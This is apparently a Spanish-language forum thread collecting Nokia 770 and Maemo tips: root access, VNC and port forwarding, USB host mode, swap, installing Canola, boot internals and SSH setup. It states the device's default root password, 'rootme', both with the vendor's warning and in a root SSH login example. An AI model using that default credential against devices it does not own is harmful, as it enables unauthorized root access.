El interés de esta aplicación está en la posibilidad de crear mini distros Linux para terminales móviles e Internet Tablet, una gran oportunidad para los programadores GNU/Linux ya que se trata de un mercado en pleno despertar.
• Para utilizar Maemo necesitas:
· Sistema operativo: Entorno Web
DESCARGA; AQUI (http://repository.maemo.org/stable/1.0/i386/Maemo_Dev_Platform_RS_v1.0_i386.tgz)
Home; http://opensource.nokia.com/projects/maemo/index.html (http://opensource.nokia.com/projects/maemo/index.html)
Seguro que ya estab este post, pero lo cierto es que no lo "vi" por eso lo re-ó-subo
[span style=\'font-size:21pt;line-height:100%\']"rootme" PASS por defecto[/span]
Tras una busqueda en Google, en la pagina oficial de maemo encontre:
Warning: If you run server as root and do not disable root login or change root's password, it is a huge security risk and gives possibility for anyone to login into your device as root using default root's password "rootme". You have been warned.
Te advierten de que si no cambias la "pass" rootme por defecto de "root" corres un riesgo de seguridd puesto que al ser una pass conocida ofrece a cualquier persona la posibilidad de logearse como el superusuario de tú maquina , te lo advierten
Una razón más para personalizar nuestras queridas N770
https://maemo.org/maemowiki/InstallSsh
Si no quieres "personalizar" tú N770 con el metodo del primer post, te cuentan como hacerlo desde el modo I+D:
$ sudo gainroot
Root shell enabled
Cambiar el password del usuario
# passwd user
Changing password for user
Enter the new password (minimum of 5, maximum of 8 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
Password changed.
Cambiar el password de "root" .
# passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 8 characters)
Please use a combination of upper and lower case letters and numbers.
New password:
Re-enter new password:
Password changed.
Or optionally disable root login. This doesn't disable the ability to use sudo gainroot.
O bien inhabiliatr el "pass login" de "root" este proceder no deshabilita la opcion de logearse como "sudo gainroot" (recordemos que este metodo es desde el modo I+D R&D enabled)
# passwd -l root
Password changed.
-
[span style=\'font-size:21pt;line-height:100%\']como crear una red VNC? [/span]
controlar mi pc con el nokia 770 desde cualquier sitio con wifi
abrir los puertos de tu Router ADSL para que el puerto 5900 apunten a la IP de tu PC
# el router donde tengas conectado tu PC con el servidor VNC debes abrir el puerto 5900 y que ese puerto se direccione al 5900 de tu PC local (ip del PC local)
con N770 le dices que "llame" a la IP publica de tu router y a tirar millas
# el N770 y desde fuera de la red pones en el programa de VNC la ip publica de tu conexion a internet (la ip publica de tu casa).
El router recibira la llamad del N770 por el puerto 5900 y la reenviara al puerto 5900 de tu PC local.
de http://es.wikipedia.org/wiki/VNC
VNC son las siglas en inglés de Virtual Network Computing (Computación en Red Virtual).
VNC es un programa de software libre basado en una estructura cliente-servidor el cual nos permite tomar el control del ordenador servidor remotamente a través de un ordenador cliente. También llamado software de escritorio remoto. VNC permite que el sistema operativo en cada computadora sea distinto. Es posible compartir la pantalla de una máquina con Windows en una máquina con GNU/Linux y viceversa.
La versión original del VNC se desarrolló en Reino Unido, concretamente en los laboratorios AT&T, en Cambridge. El programa era de código abierto por lo que cualquiera podía modificarlo y existen hoy en día varios programas para el mismo uso.
En la enseñanza VNC sirve para que el profesor comparta su pantalla con los alumnos, por ejemplo en un laboratorio. También puede usarse para que un técnico ayude a un usuario inexperto, el técnico ve remotamente el problema que reporta el usuario.
El programa servidor suele tener la opción de funcionar como servidor HTTP para mostrar la pantalla compartida en un navegador con soporte de Java. En este caso el usuario remoto no tiene que instalar un programa cliente de VNC, éste es descargado por el navegador automáticamente.
leer mas (http://es.wikipedia.org/wiki/VNC)
-
[span style=\'font-size:21pt;line-height:100%\']Microphono Hacking [/span]
Asegúrate de tener los "cascos/phones" conectados al N770
Logearse como Súper usuario
En modo I+D R&D mode:
sudo gainroot
O si tienes tus pass personalizadas, modo Producción:
sudo su -
Después teclea...:
cd /sys/devices/platform/audio-i2c/
echo 1 > mic_enable
echo 1 > mic_loopback
echo 100 > gain_left
echo 100 > gain_right
echo 90 > volume_left
echo 90 > volume_right
-
[span style=\'font-size:21pt;line-height:100%\']USB Host Mode[/span]
Esquema del USb Host[img]http://img227.imageshack.us/img227/3195/host14fd.jpg\" border=\"0\" class=\"linked-image\" /]
La coneccion es facil si tienes lo cables oportunos:
Un cable que tengo de un disco duro externo en "Y" y que posee:
1 USB pequeño para la N770
1 USB Macho para la conexión al HUB.
1 USB Macho/Hembra para alimentar el dispositivo.
Un adaptador USB Hembra/Hembra
Con el Flasher desde linux.
--enable-usb-host-mode
Para pasar de modo Host a modo periferico no es necesario reiniciar basta con entrar en Xterminal y poner:
sudo gainroot
(para entrar en modo root)
echo peripheral > /sys/devices/platform/tahvo-usb/otg_mode
Y si quieres volver a modo Host:
echo host > /sys/devices/platform/tahvo-usb/otg_mode
¿cómo puedo volver el Nokia 770 al modo normal, como estaba antes de activar lo de teclado USB? desdePC
Desde linux:
./flasher --disable-usb-host-mode
1- lo conectas por USB, abres un terminal, yo el archivo flasher.macosx lo tengo en Macintosh HD
sudo -s
nos pide el Password:
/flasher.macosx --enable-rd-mode --enable-usb-host-mode
Suitable USB device not found, waiting
apagamos y encendemos como si fueramos a flashear el icono de la casita
USB device found found at bus 003, device address 004-0421-0105-02-00
Found board Nokia 770 (F5)
NOLO version 0.9.0
The device is now in R&D mode
The device is now in USB host mode
/flasher.macosx --enable-rd-mode --reboot
http://www.hack-lab.com/index.php?entry=entry060505-162525
La 770 tiene la posibilidad de ser activada como usb-host ( o sea, que le podemos instalar dispositivos USB).
El principal problema de esta, es que no tiene Corriente por su puerto USB y hay que proporcionarsela.
Para ello he utilizado un 7805C (su pricipal caracteristica es, que estabiliza el voltaje). Quedaria algo asi:
[img]http://www.hack-lab.com/images/cimg0726.0.jpg\" border=\"0\" class=\"linked-image\" /]
[span style=\'font-size:21pt;line-height:100%\']¿Se puede activar el USB Host Mode sin necesidad de PC?[/span]
Poner la 770, en modo Usb-Host/Cliente con un click (http://www.hack-lab.com/index.php?entry=entry060512-111151)
Casi siempre tengo la 770 en modo Usb-Host, pero de vez en cuando la tengo que conectarla a mi WorkStation para subir musica u otras cosas. El problema viene cuando la has dejado en modo cliente o dispositivo, y tienes que conectarle algo, ya sea una teclado o una llave usb.
[img]http://www.hack-lab.com/images/usblogo.jpg\" border=\"0\" class=\"linked-image\" /]
Despues de hacer algunas averiguaciones, y leer algunos foros, he visto la luz , y como no he visto una solucion sencialla a mi problema, he creado unos scripts para que una vez instalados en la 770,para que activar/desactivar el usb-host no sea necesario un Ordenador.
Para instalarlo, hay que bajarse el el programa del REPOSITORIO (http://www.hack-lab.com/repositorio.php?subdir=Nokia%20770%2FScripts&sortby=name) y hacerlo a mano, (ya lo siento pero soy un poco vago).
Lo primero que ya se supone, es que hay que tener privilegios de "root", siendo asi, copiar en la carpeta /sbin el contenido de la carpeta sbin que esta en el zip. Como paso siguiente hay que modificar el archivo /etc/sudoers (ojo! con mucho cuidado) y añadir estas dos lineas tal como está en la imagen:
[img]http://www.hack-lab.com/images/sudoers_usbpng.png\" border=\"0\" class=\"linked-image\" /]
Y ahora para que aparezca en el menu teneis que hacer lo siguiente:
1.- Copiar los dos ficheros ".desktop" en la carpeta /etc/others-menu/1400_tana_fi_utilities
2.- Copiar la imagen usb.png (esto es pa que kede potito) en /var/lib/install/usr/share/icons/hicolor/scalable
Y ya esta!
[img]http://www.hack-lab.com/images/usba_770_1_png.png\" border=\"0\" class=\"linked-image\" /]
Notas:
1.- Antes de empezar, asegurarse que la 770 esta en modo dispositivo
2.- Mucho cuidado con el archivo /etc/sudoers
3.- A poder ser dejar los ficheros ".sh" que van a /sbin con permisos de lectura y ejecucion, y que no tenga permisos de escritura
4.- El icono de Usb del acceso directo saldra cuando reinicie la 770
Link directo: http://www.hack-lab.com/repositorio/Nokia%20770/Scripts/usbhost%20manager.zip
Un Saludo
Anakin
El cable de las PSP puede servir; [img]http://psp-news.dcemu.co.uk/psp-2in1-usbcable.jpg\" border=\"0\" class=\"linked-image\" /]
[img]http://lbattraw.home.insightbb.com/770_full_setup.jpg\" border=\"0\" class=\"linked-image\" /]
Por 4´90 euros (http://www.pearl.fr/article-PE4477.html)[img]http://nokia770.ldeweb.net/blog/images/accessoire/image5-2.jpg\" border=\"0\" class=\"linked-image\" /]
-
[img]http://static.flickr.com/67/212546925_66de51b481_b.jpg\" border=\"0\" class=\"linked-image\" /][img]http://static.flickr.com/84/212546924_520a6a2408_b.jpg\" border=\"0\" class=\"linked-image\" /][img]http://static.flickr.com/73/179077346_ce9ac10207_b.jpg\" border=\"0\" class=\"linked-image\" /][img]http://static.flickr.com/77/212546927_8ceafb0d0b_b.jpg\" border=\"0\" class=\"linked-image\" /]
-
[span style=\'font-size:21pt;line-height:100%\']Trabaja la partición de Swap correctamente en N770?[/span]
[span style=\'font-size:17pt;line-height:100%\']Sabemos que el OS 2006 te crea una Swapfile[/span]
*Herramientas, Panel de Control, Memoria, Virtual
[span style=\'font-size:17pt;line-height:100%\']Sabemos que el tamaño máximo que estima oportuno es de 64 megas[/span]
Sabemos ¡por que, lo podemos ver! que la partición "Swap" se crea en nuestra RS-MMC!
Pero ¿sabemos si esta a parte, además de creada, esta "reconocida" y usada por el N770???
[span style=\'font-size:25pt;line-height:100%\']La ruta /etc/fstab[/span]
Linux hace una llamada a swapon -a durante el arranque, lo que monta (o debería de hacerlo) todas las particiones de swap disponibles que están listadas en /etc/fstab.
En el N770, creé un nuevo “swapfile” desde el Panel de Control..., "tambien se puede hacer, mediante el comando":
# dd if=/dev/zero of=/swapfile count=(aquí el número de megas en número de bytes)
habria que fijar el file de la Swap como espacio de intercambio:
# mkswap /swapfile
y activar el uso de memoria swap con;
# sync (asegura que el archivo -SWAP- esté completamente escrito en la RS-MMC)
# swapon -a (-a activa los ficheros y particiones registrados como swap en “/etc/fstab”)
swapon, swapoff - enable/disable devices and files for paging and swapping
SYNOPSIS
/sbin/swapon [-h -V]
/sbin/swapon -a [-v] [-e]
/sbin/swapon [-v] [-p priority] specialfile ...
/sbin/swapon [-s]
/sbin/swapoff [-h -V]
/sbin/swapoff -a
/sbin/swapoff specialfile ...
Si se tiene que deshacerse del archivo de intercambio, asegurar que no esté activo. Para ello use el comando swapoff y despues borrar con toda seguridad el archivo -swap-
Despues habría que comprobar si es más rápida con más cantidad de arhivos trabajando a la vez...
-
[span style=\'font-size:21pt;line-height:100%\']CANOLA el Media Center de Nokia 770[/span]
Web address: http://repository.maemo.org/ Ir al Sitio externo
Distribution: scirocco
Components: free non-free
Web address: http://openbossa.indt.org/canola/repository/ Ir al Sitio externo
Distribution: scirocco
Components: user
# instalar desde el xterm:
"apt-get install canola"
Traduccion asi por encima de un trozo de post Handful
Voy a resumir los principales problemas:
1) No saber que version esta funcionando en nuestro 770 (mistral ou scirocco) e instalar la version equivocada
2) Introducir el repositorio de forma incorrecta (olvidarse del free non-free en los componentes ) o mismo olvidarse de introducir canola. Se debe cubrir correctamente
3) Tener algun otro repositorio fallando!. Si, el instalador de aplicaciones simplemente no funciona si uno de los repositorios no responden. Entonces muchas veces los usuarios piensan que es un problema del Canola y no lo es.
4)No reiniciar la maquian. Si, infelizmente necesitamos reiniciar la maquina para garantizar que todo sera inicializado perfectamente, y principalmente para subir los servicios que se inician al arrancar o, que precisan de autentificacion para ejecutarse en el modo superusuario (root) e que no queriamos.
----------------------------------------------------------------------------------------------
Entonces para solucionar estos problemas
1)Limpie sus repositorios, (Si preferis hacer una copia de seguridad de /etc/apt/sources.list )
2) Introduzca correctamente los repositorios
3) Instale canola
4) Reinicie la 770 antes de iniciar Canola por primera vez
-----------------------------------------------------------------------------------------------
Si continua teniendo problemas, entonces en vez de un error simple (Mistral cuando usted usa Scirocco) esta sucediendo un error grande.
-----------------------------------------------------------------------------------------------
Solo los beta tester tuvieron problemas, que necesitarian flashear, apagar a mano TODO el canola, lo que no es tarea sencilla para los que no estan acostumbrados a linux
------------------------------------------------------------------------------------------------
Algunos comentarios que encontre interesantes aqui.
"Ya he podido instalar Canola. No me ha dado problemas de instalación. Aunque el programa no desmerece creo que faltan algunos ajustes."
-Si, es una beta, y siempre necesita un ajuste. Necesitamos que ustedes lo usen para encontrar errores, funciones y poder trabajar en ello para mejorar lo maximo posible
" Pues, por ejemplo, no permite salir a otras aplicaciones si no cierras previamente el programa. "
-Bien, usted puede utilizar el boton “home” del 770, que tiene esa funcionalidad, y volver para el escritorio. Canola se minimiza, usted puede volver para Canola apretando 2 veces la tecla “home”.
Aquí existe un bug conocido: aplicaciones como canola, no se restauran despues de la minimizacion de una vez, algun evento falla, necesita una segunda pulsacion del boton. Pero no bloquea ninguna funcionalidad, simplemente basta con dar hacer una doble pulsacion
"No reconoce ficheros de playlist m3u."
-Estraño, deberia reconocerlos. En todo cado, si fuera un buga vamos a corregirlo tan rapido que usted no lo percibira. Visto pr encima (no tengo m3us en mi musica) veo que son reconocidos en las iradios. Voy a investigar sobre m3u en la librería de musica.
"Las fotos, si son algo pesadas (700kb) tardan en aparecer.."
-Aqui por desgracia no existen milagros. Usted esta usando linux en un aparto con 200Mhz y poquisimo ram. Canola en si, no hace nada con las fotos. No tarda mas de lo que tardaria fuera de el, simplemente es cuestion de capacidad de procesamiento. Por eso colocamos no WIKI: “por favor redimensiona tus fotos antes de enviarlas al 770”. Simplemente por que sabemos que el Hardware no puede trabajar con fotos tan grandes. Por que? Haga uentas de cuanta memoria neestia para descomprimir una foto de 1600x1200 en memoria? Es mucho, mas de lo que los 700kb que ocupa, y 700kb son fotos grandes. Las fotos pueden usar por veces masde 10 megas de RaM, e aun asi necesitamos redimensionarlas.
Esto es tan serio que si usted hace eso, no necesariamente en Canola, sin swap, el dispositivo se reinicia. Si, asi de simple, por que? Por que la memoria se consume y los procesos son “killed”
"Desde mi punto de vista, creo que las expectación creada ha sido superior a las prestaciones de la propia aplicación. Se integra en un único programa varias aplicaciones multimedia, pero estás ya estaban en el n770."
-Si, respeto su punto de vista, pero lo mejor de la vida es poder escoger verdad? Yo adoro poder escoger no suar Windows. Adoro no escoger Ipod, y adoro no poder seguir las modad. Desde el principio no rezamos por un milagro, siempre fui muy directo aquí en el foro, y deje claro: “Canola es una nueva forma de usar tu 770, pero no hace milagros”. Entonces canola suena forma mas de ver su 770
"Pero estás ya estaban en el n770."
Disculpe, pero ninguna aplicación do 770 puede hacer
1) streaming de Video sobre Upnp
2) streaming de fotos sobre dpap (iphoto)
3) streaming de Photos dpap ou Upnp encuanto escucha musica de otro servidor
Problema
"Probado el PMM (PHILIPS MEDIA MAMAGER) que es el que usaba con el MEDIA STREAMER.
Tengo un problema. Se conecta bien, muestra toda la información de carpetas, etc, pero una vez entrando en las carpetas, me dice que no hay nada en ellas. Falso."
Solucion
Lo que sucecde es que el media streamer simplemente entra en la lista de archivos. No verifica que sean validos hasta mas adelante. Por lo que si no se pueden reproducir, no los mostramos. Encuentro que esto es mas apropiado que mostrar algo y despues no poder reproducirlo.
Problema
"handful, a mi me da un problema:
con el repositorio:http://openbossa.indt.org/canola/repository/ mistral user, cuando intento instalar me dice: ¨faltan algunos paquetes necesarios para la instalacion¨
Si pongo scirocco, el programa no baja.
¿que hago mal?
Solucion
Usted agrego el repositorio de maemo? Es importante pues contiene las otras dependencias que necesitamos, incluyalo y no habra problemas
Web address: http://repository.maemo.org/
Distribution: scirocco
Components: free non-free
Web address: http://openbossa.indt.org/canola/repository/
Distribution: scirocco
Components: user
Problema
# ¿Los vídeos deben estar en algún formato en concreto? He metido vídeos M4V y MOV en la tarjeta y no me aparecen.
Solucion
Para poder reproducir los vidios directamente es necesario convertirlos a un formato optimizado. Como debes saber el 770 es un aparato con un procesador “pequeño” si lo comparamos con un ordenador de sobremesa, algunos formatos ncesitan mas procesador que otros. Lo que recomiendo es: que pases los videos usando Maemo Video Conveter. Funciona perfectamente
Problema
¿Se pueden meter vídeos en H.264?
Solucion
Si suenan en el reproductor de video del 770, debe reproducirlos canola. Haga la prueba
Problema
Al entrar en Shared Music me aparece la biblioteca compartida del iTunes de mi iBook, pero no me permite entrar. Sin embargo, en la configuración de iTunes dice que hay dos clientes conectados. ¿Hay alguna incompatibilidad con iTunes?
Solucion
Estas usando Itunes 7 verdad? Infelizmente la penultima semana antes de la beta, apple libero una atualizacion del itunes que cerro todo el protocolo de sharing (compartir). Estamos con las manos atatdas hata que la comunidad tenga una nueva forma de comunicarse con los apples (programas de supongo). Infelizmente Apple nos cerro la puerta en las narices.
Problema
handful No se puede dar a los videos para alante ni atras.
Solucion
Debes de haber visto el primer video y recuerdas la barra de busqueda no? Infelizmente no podemos usarla, por que es codigo propietario. El codigo que usabamos no es nuestro, e el dueño no acepto nuestro patch. Por eso permanecemos imposibilitados. Pero vamos a correr para mejorar no solo eso, si no hacer posible el uso de las teclas tb.
Problema
handful Creo que todos los servers UPDP que citas son para windows, yo utilizo linux y estoy intentandolo con ushare (parece que todo va bien veo los files pero al abrirlos me da error, da igual que sean videos, musica o fotos) y probe gmediastreamer (pero este ultimo no soporta video)
¿Habeis testado alguno con linux que funcione con musica, fotos y video? muchas gracias.
Solucion
Hola en nuestras maquinas linux el twonky fue probado y funciono correctametne. Aun estamos probando con otros.
La manera de arreglar el tema de conexiones locales, como la del configurador del canola, y que ademas no enciende el wireless.
Hay que ejecutar este comando desde consola:
gconftool -s -t string /system/osso/connectivity/IAP/Localhost/type DUMMY
De esta manera cuando le demos a conectar nos saldra, además de los habituales en funcion de donde estemos, el AP "Localhost". Al darle permitira hacer conexiones locales sin encender el wireless (mas bateria).
EDITO: La bolita del mundo no aparece como conectada, es normal por el tipo de conexion, pero si pinchamos en ella, veremos que esta conectado.
-
[span style=\'font-size:14pt;line-height:100%\']Como funciona mi N770 desde que apretó el Power[/span]
Vamos a ver si ponemos un poco de conocimiento al asunto;
Lo primero que hay que saber es que existen distintos modos de poner en marcha un sistema Linux, así como niveles de ejecutar el sistema, cada uno puede ejecutar un conjunto distinto de servicios
El cmd, # ps axf1 nos logueamos como; ~ $ sudo su -
Nokia770-39:~# ps axf1
PID Uid VmSize Stat Command
1 root 488 S init [2]
2 root SWN [ksoftirqd/0]
3 root SW [watchdog/0]
4 root SW< [events/0]
5 root SW< [khelper]
6 root SW< [kthread]
22 root SW< [kblockd/0]
36 root SW< [omap_uwire]
42 root SW< [khubd]
93 root SW [pdflush]
94 root SW [pdflush]
96 root SW< [aio/0]
95 root SW [kswapd0]
171 root SW< [cqueue/0]
172 root SW< [kseriod]
206 root SW [mtdblockd]
240 root SW< [krfcommd]
249 root SW [mmcqd]
278 root 536 S < dsme -d -l syslog -v 4 -p /usr/lib/ds
283 root 536 S dsme -d -l syslog -v 4 -p /usr/lib/ds
284 root 536 S dsme -d -l syslog -v 4 -p /usr/lib/ds
285 root 312 S /usr/bin/bme
331 root SWN [jffs2_gcd_mtd4]
351 root 412 S < /sbin/udevd --daemon
562 nobody 652 S < /usr/sbin/dnsmasq -k -i lo -a 127.0.0
576 messageb 1344 S < /usr/bin/dbus-daemon --system
581 root 1500 S < /sbin/mce
585 messageb 1532 S /usr/lib/gconf2/gconfd-2
593 root 3108 S < /usr/bin/Xomap -mouse /dev/input/mous
619 user 236 S < /usr/sbin/temp-reaper
622 user 1156 S < /usr/bin/dbus-daemon --session
626 user 2600 S < /usr/lib/sapwood/sapwood-server
630 user 2072 S < /usr/bin/matchbox-window-manager -the
640 root 1104 S /usr/sbin/dsp_dld -p --disable-restar
660 root 1136 S < /usr/sbin/hcid -n
662 root 492 S < /usr/sbin/sdpd -n
669 root 1020 S < /usr/bin/bme-dbus-proxy -N
707 root 1364 S /usr/bin/osso_hss
712 root 628 S < /usr/bin/esd
736 root 1224 S < /usr/bin/btcond -l
754 root 1496 S < /usr/sbin/ke-recv
760 root 1292 S < /usr/sbin/wlancond
763 nobody 1060 S < /usr/bin/btpin -l
767 root 1496 S < /usr/sbin/icd
787 user 1844 S < /usr/bin/maemo-launcher --daemon --qu
837 user 352 S < /usr/bin/maemo_af_desktop
838 user 8560 S < /usr/bin/maemo_af_desktop
844 user 352 S < /usr/bin/osso-connectivity-ui-conndlg
845 user 4080 S < /usr/bin/osso-connectivity-ui-conndlg
848 user 352 S < /usr/bin/hildon-input-method
849 user 6256 S < /usr/bin/hildon-input-method
853 user 596 S < /usr/bin/clipboard-manager
860 root 1384 S /usr/bin/ias
862 user 2116 S /usr/libexec/dbus-vfs-daemon
868 user 3332 S < /usr/bin/osso-media-server
871 user 2116 S /usr/libexec/dbus-vfs-daemon
874 user 2116 S /usr/libexec/dbus-vfs-daemon
893 systemui 5048 S < /usr/bin/systemui
911 user 508 S /bin/sh /usr/bin/canola-conf.sh
934 user 3556 S /usr/bin/canola-conf
939 root 1800 S /usr/bin/osso_alarm
946 user 3556 S /usr/bin/canola-conf
950 user 352 S /usr/bin/osso-xterm
951 user 6844 S /usr/bin/osso-xterm
952 user 612 S gnome-pty-helper
953 user 652 S sh
954 user 6848 S /usr/bin/osso-xterm
955 user 6848 S /usr/bin/osso-xterm
956 root 696 S -sh
970 root 600 R ps axf1
En nuestra N770 mostrara una burrada de procesos, si fijamos nuestra curiosidad en el nº1 (PID 1) es el "init", es decir es el proceso nº 1 de nuestra N770 el primero que se inicia tras la ejecución del Kernell
PID 1 Uid root Vmsize 488s (init 2)
1º El BIOS inicia el Hard del N770 y acto seguido carga el Sector de arranque
2º El MBR carga los demás gestores de arranques de los servicios que apuntan al kermell
3º El núcleo inicia los dispositivos periféricos, los drivers y monta el sistema de archivos raíz, llamando a /sbin/init
4º /sbin/init es en verdad el programa de inicio maestro (PID 1) es el "proceso" el PAPA de todos los demás procesos de nivel de usuario, 1º lee /etc/inittab/ y sigue activando otros guiones de dicho archivo
5º Cada distribución es distinta en este punto, en el caso de Maemo N770 es puro Debian, puesto que su nivel de ejecución es el "init 2", lo que indica que utiliza /etc/rc2.d y los guiones contenidos en el mismo file, que son enlaces simbólicos a guiones reales en /etc/init.d
[span style=\'font-size:10pt;line-height:100%\']innitab[/span] en nuestra Debian N770
# OSSO-CORE inittab - see runlevel configuration proposal
# The default runlevel.
id:2:initdefault:
# default debian stuff
si::sysinit:/etc/init.d/minircS
~~:S:wait:/sbin/sulogin
l0:0:wait:/etc/init.d/minishutdown
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/minireboot
# Normally not reached, but fallthrough in case of emergency.
z6:6:respawn:/sbin/sulogin
# What to do when CTRL-ALT-DEL is pressed.
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
# Action on special keypress (ALT-UpArrow).
kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."
# What to do when the power fails/returns.
pf::powerwait:/etc/init.d/powerfail start
pn::powerfailnow:/etc/init.d/powerfail now
po::powerokwait:/etc/init.d/powerfail stop
# /sbin/getty invocations for the runlevels.
#
# The "id" field MUST be the same as the last
# characters of the device (after "tty").
#
# Format:
# :::
#1:2345:respawn:/sbin/getty 38400 tty1
#2:23:respawn:/sbin/getty 38400 vc/2
#3:23:respawn:/sbin/getty 38400 tty3
#4:23:respawn:/sbin/getty 38400 tty4
#5:23:respawn:/sbin/getty 38400 tty5
#6:23:respawn:/sbin/getty 38400 tty6
# Horrible temp hack for autologin
#x:23:respawn:su - root -c "/etc/init.d/xfbdev"
# Example how to put a getty on a serial line (for a terminal)
#
#T0:123:respawn:/sbin/getty -L tts/0 115200 vt100
#T1:123:respawn:/sbin/getty -L tts/1 115200 vt100
#T0:12345:respawn:/sbin/getty -L ttyS0 115200 vt100
#T1:12345789:respawn:/sbin/getty -L ttyUSB0 115200 vt100
Los niveles de ejecución en nuestro pequeño Debian 770
La 1ª sesion X es siempre :0, se puede abrir una 2ª sesión de X pero con distinto usuario desde una consola con
# startx -- :1
Nota; si se intenta abrir la 2ª sesión "X" con el mismo, el resultado sera desastroso
0:Detener
1:Monousuario
2-5: Multiusuario
6: Reiniciar
Ya sabéis lo que es ese; init 6 al final del cmd
l6:6:wait:/etc/init.d/minireboot
según vemos el innitab en nuestra Debian N770
Próximo, el bootmenú, tty, getty..etc
# /sbin/getty invocations for the runlevels.
Para Saber que getty usa Debian N770
ps ax | grep getty
1017 root 41s grep getty
tty, ya adelanto que es un programa
# tty
/dev/pts/0
tty indica en que Terminal virtual me encuentro, antiguamente en UniX se hacía desde el nº de Terminal fisico, no virtual, pero la homonimia ha calado en la termininologia de LinuX, es algo así a la locución ¡Tirar de la cadena! cuando vamos al Water ¿que cadena? jejeje
Con estos datos ya podemos entender un poco más acerca de por ejemplo:
Switching root from Flash to RS-MMC without Flasher
Interruptor de "root file system" desde la Flash(mmc) a la RS-MMC sin Flasher
En mi Nokia 770, uso una tarjeta RS-MMC Formateada con ext3 para llevar a cabo los desrrollo del rootfs
nota; diferenciar "mmc" como memoría flash interna del N770 de la memoría de la tarjeta Flash RS-MMC
~ $ sudo su -
Nokia770-39:~# set
MMC_DEVICE_FILE='/dev/mmcblk0p1'
MMC_MOUNTPOINT='/media/mmc1'
La manera más evidente de arrancar desde la tarjeta RS-MMC es utilizar el Flasher con este comando:
./flasher --set-root-device mmc
Y para volver al modo "normal" de operar
./flasher --set-root-device flash
¡Sin embargo el Flasher precisa asistencia desde un PC como herramienta de rescate
[span style=\'font-size:11pt;line-height:100%\']Desde la N770 los comandos ;[/span]
Para hacerlo en ( mmc-interna):
sudo gainroot
chroot /mnt/initfs cal-tool -R mmc
init 6
Para bootear desde Flash
sudo gainroot
chroot /mnt/initfs cal-tool -R flash
init 6
Creo que es el modo de llamar al modo I+D de la Nokia 770 sin precisar de PC, usando la mmc interna para llamar a la "tool/herramienta" Flasher
la pagina original (caida)
http://david.connolly.name/blog/hub/maemo/2006/04/29/Switching-root-from-Flash-to-RS-MMC-without-Flasher.html?page=comments
Pero resulta interesante profundizar en;
http://www.math.ucla.edu/~jimc/nokia770/hacking.html
-
[span style=\'font-size:21pt;line-height:100%\']SSH entre Windows y Nokia 770[/span]
Sobre el uso del ssh SSH es un programa que permite acceder a otro ordenador a través de la red, ejecutar comandos en la máquina remota y mover ficheros entre dos máquinas. Provee autenticación y comunicaciones seguras sobre canales inseguros. Es un reemplazo de rlogin, rsh y rcp. SSH funciona con una mezcla de criptografía de clave pública, lo que le permite garantizar la privacidad de las comunicaciones y su integridad.
Funciona mediante varias capas diferenciadas:
1º una de transporte es la que se encarga del cifrado, por lo que para las capas superiores este es transparente y representa como si enviaran el texto en plano. También es la que se encarga de autentificar al servidor, comprobando que nadie lo haya suplantado, por lo que debemos estar atentos ante mensajes de nuestro cliente que nos indiquen que este puede haber cambiado.
2º una capa de conexión, es muy versátil, por lo que se puede implementar de muchas maneras. Una de las más típicas es mediante un usuario y una contraseña que se envían al servidor para que este las compruebe, la capa de conexión permite el uso de diversos canales en una sola conexión, por lo que podríamos, por ejemplo, abrir dos líneas de comando sobre una misma conexión.
[span style=\'font-size:30pt;line-height:100%\']Putty (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) cliente ssh desde Windows[/span]
Descargar y ejecutar PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) no necesita instalar.
1. Ejecute PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)
2. En el menú de configuración seleccione la categoría Session
3. Introduzca el nombre de su dominio o IP en el campo Host Name y seleccione el protocolo SSH
En Windows desde la consola de comandos, teclea:
# ipconfig /all
Para ver tus datos de coenxión...
4. Introduzca un nombre para esta conexión en el campo Saved Sessions
5. Vuelva al menú de configuración y seleccione la categoría SSH
6. Asegúrese de que está marcada la opción 2 en Preferred SSH protocol version
7. En la sección inferior Encryption options seleccione Blowfish y haga clic sobre Up
8. Seleccione nuevamente la categoría Session
9. Para guardar la configuración pulse Save y Open para conectar
[img]http://www.aemilius.net/img/manual-putty-telnet-ssh-01.gif\" border=\"0\" class=\"linked-image\" /]
Nota; el punto 7 permite establecer la preferencias de cifrado, el protocolo SSH suele utilizarse para ofrecer consolas remotos a los usuarios, pero también puede servir como transporte de otro tipo de conexiones, añadiéndoles cifrado y autenticación.
Para conectar a un servidor cuya configuración ha sido guardada con anterioridad deberá seleccionar la conexión deseada en Saved Sessions y pulsar Load, después hacer clic en Open para conectar.
[span style=\'font-size:30pt;line-height:100%\']ssh desde Nokia 770[/span]
Pasos
Hay dos servidores de SSH disponibles para los 770: openssh y dropbear.
Agregar el reposotorio:
http://repository.maemo.org/ mistral free non-free
Loguearse como root
sudo su -
apt-get update
apt-get install ssh
IP de ejemplo; 192.168.0.42
Para hacer la "raiz" al ssh
ssh root@192.168.0.42
# colocar la IP vuestra
Password: (por defecto) rootme
ssh user@192.168.0.42
Para autenticar con pubkey hay que generar un par de llaves con ssh-keygen, despues copiar la llave pública (id_rsa.pub o id_dsa.pub, dependiendo del tipo de key) en tu 770 y renombrarla en /home/user/.ssh/authorized_keys.
Para el OS2006 (http://www.maemo.org/maemowiki/InstallSsh2006)
[span style=\'font-size:30pt;line-height:100%\']Comandos SSH Shell frecuentes,[/span]
Fuente: Aemilius.net
Este es un listado de los comandos SSH que se usan con más frecuencia. Los comandos se encuentran organizados por tema e incluyen una descripción breve para comprender como usarlos.
Comandos de navegación
pwd muestra el path completo del directorio en el que se encuentra
cd cambia de directorio, por ejemplo cd directorio/subdirectorio
cd ~ lleva a su directorio home
cd - lleva al último directorio en el que estuvo
cd .. sube a un directorio superior
Listado de archivos
ls lista archivos y directorios de un directorio
ls -al lista archivos y directorios e información sobre los mismos
ls -aR lista archivos e información incluyendo todos los subdirectorios
ls -aR | more lista archivos e información incluyendo todos los subdirectorios por pantallas
ls -alR > resultado.txt lista archivos e información de subdirectorios y lo guarda en un archivo
cat resultado.txt mostraría en pantalla el contenido del archivo
ls *.html lista todos los archivos acabados en .html
